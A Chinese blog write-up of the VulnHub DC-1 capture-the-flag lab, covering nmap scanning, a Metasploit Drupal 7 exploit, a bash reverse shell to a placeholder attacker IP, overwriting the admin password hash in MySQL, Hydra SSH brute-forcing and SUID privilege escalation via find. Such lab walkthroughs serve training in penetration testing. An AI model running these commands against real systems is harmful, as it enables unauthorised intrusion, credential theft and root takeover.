DC1靶场 Drupal

已于 2024-03-23 17:03:30 修改
阅读量1k 收藏 22
点赞数 26
分类专栏: DC靶场 文章标签: linux 运维 服务器
于 2024-03-02 23:08:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62438849/article/details/136126088
版权

实验步骤:

查看DC1的MAC地址 

nmap -sV -p- 192.168.146.0/24 扫描整个网段,192.168.146.1---192.168.146.254

-p- 所有端口

-sV     探测服务/版本信息   

192.168.146.138是DC1的ip地址

使用默认代理设置,在kali的火狐浏览器查看

看到这个登录框,猜测有sql注入漏洞,用的Drupal,是一个CMS(内容管理系统)

用Wappalyzer插件可以看到这个网站信息,Drupal版本是7

用metasploit工具查看Drupal7的漏洞

search Drupal

disclosure公开,rank等级,选一个2018年的漏洞

use 漏洞名称

show options

set RHOSTS DC1靶机的ip地址,

exploit

shell

metasploit原理,会生成一句话木马,利用漏洞拿到shell

ls

反弹shell,受害者主机主动连接攻击者的服务端程序

python -c 'import pty;pty.spawn("/bin/bash")'

-c:表示接下来执行的python代码

import pty;导入pty库

spawn创建一个新的伪终端

运行/bin/bash,启动一个新的shell

利用bash,bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1

nc -lvp 端口(-l:指定 nc 作为服务器监听连接

-p:指定本地端口号

-v:显示详细信息,包括连接和数据传输的详细信息

)

查看flag1.txt,在提醒我们配置文件里有东西

find / -name settings.php

/ 表示根目录,搜索文件从最高层开始

-name 搜索与指定名称匹配的文件

得到数据库用户dbuser密码R0ck3t

暴力破解字典攻击不是获得权限的唯一方法,提醒我们用下面的账号

能用find命令说明能suid提权

登录数据库看看

mysql -udbuser -pR0ck3t;注意有个;

看一下drupaldb数据库的表,要用SQL语句,

use drupaldb;

show tables;

有一个users表,查看内容

select * from users;

有两个用户admin和Fred,密码用的hash函数加密

试着修改pass,试看看有无权限

update users set pass = "111111"

但是我设置的hash(x)=111111值,但x才是密码

试着找一下加密函数在哪,百度一下

退出exit  回到原来的目录

php scripts/password-hash.sh 1111111

hash值是$S$DDFOiP3hLOW7DUMKb4TfbC5mkEiCuKuxLGNbnRWR7hPoF0IQy1gZ

回到数据库,修改update users set pass = "$S$DDFOiP3hLOW7DUMKb4TfbC5mkEiCuKuxLGNbnRWR7hPoF0IQy1gZ" where name = 'admin';

拿到用户admin和密码1111111,尝试登录,成功

点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow

查看存放密码的文件

/etc/passwd

存储有用户的基本信息,如用户名、用户ID等,所有用户均可访问

内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中

主目录:/home/username 用户登录后有操作权限的访问目录

Shell 命令解释器的功能就是将用户输入的命令转换成系统可以识别的机器语言,默认为bash

bash拥有权限范围内的所有权限

用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell

看到一个flag4

/etc/shadow

存储有用户的密码等信息,需要root用户才能访问

22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录

暴力破解一下密码,

dirbuster是用来暴力破解网站目录

用Hydra

kali自带的字典,路径为/usr/share/john/password.lst

hydra -l 指定用户名 -p 指定密码 ip ssh
hydra -L 用户字典 -P 密码字典 

-f找到第一对密码就终止破解

-vV显示详细过程

hydra -l flag4 -P /usr/share/john/password.lst 192.168.146.138 ssh -vV -f 

贪心的我还试了试root用户,懒得等,放弃

ssh登录flag4,暗示我们暴力破解root用户会比较困难,那试着去提权

suid提权,已知的具有SUID权限的二进制可执行文件大体有:nmap vim find bash more less nano cp awk

find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤

-perm匹配权限

-4000 SUID权限

将错误输出到黑洞(相当于垃圾桶)

 find -exec /bin/sh \;对find找到的每个文件执行/bin/sh

find / -name (某个存在的文件名) -exec "/bin/sh" \;

/root目录下拿到最终flag

SQL注入漏洞利用

(明天写)

参考文章:

简略版

详细版

MOMO8849
关注
  • 26
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试初体验:DC-1靶场
SmileAssassn的博客
08-07 434
渗透测试靶场DC:1,新手练习使用
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
DC-1靶场
最新发布
mlws1900的博客
03-21 1034
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
渗透靶场--DC1
weixin_45794666的博客
07-20 570
DC1 攻击机ip:192.168.1.164 靶机ip:192.168.1.163 目标:获取靶机上的5个flag 1.内网渗透,先利用namp扫描整个网段 目标机为192.168.1.163 2.继续nmap嗅探端口信息,。 开放了22/80/111/56771端口 3.那就访问80端口 是一个网站 CMS为Drupal 4.使用dirseach扫描网站目录,扫出了一个robots.txt # # robots.txt # # This file is to prevent the crawli
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
flows.homekit.v1.json.zip
02-15
斐讯 DC1 WIFI 排插,官方 APP 已经无法使用,通过 DNS 劫持到自己的服务器,实现手机控制。使用dnsmasq劫持smartplugconnect.phicomm.com到你NodeRed所在IP,下载脚本,全局搜索替换 "您的DC1的MAC地址" 为您的 DC1...
DC1_map_airtrafficcontrol_
10-02
计算map值,并进行界面显示,其中map为监控扇区告警参数,为空管领域的一种参数
DC靶场系列--DC1
BGiscool的博客
06-28 4728
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-1靶场详解
苏生要努力
03-12 2681
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
VulnHub之dc1靶场(3)
p_utao的博客
02-20 200
靶场信息: 地址:https://www.vulnhub.com/entry/dc-1-1,292/ 难度:简单 目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志 运行:vm work 信息收集 nmap直接扫描网段存活主机 扫描常见端口 nmap 10.7.10.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST Nmap scan report for 10.7.10.29 Host is u
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 291
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 484
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7459
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶场实战详解
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标机器上正确添加了反弹shell的代码,并将其放置在适当的位置,比如backups.sh文件中。最后,您需要等待计划任务执行反弹shell的代码。如果仍然无法成功反弹shell,请检查您的代码和配置是否正确,并确保您有足够的权限执行这些操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值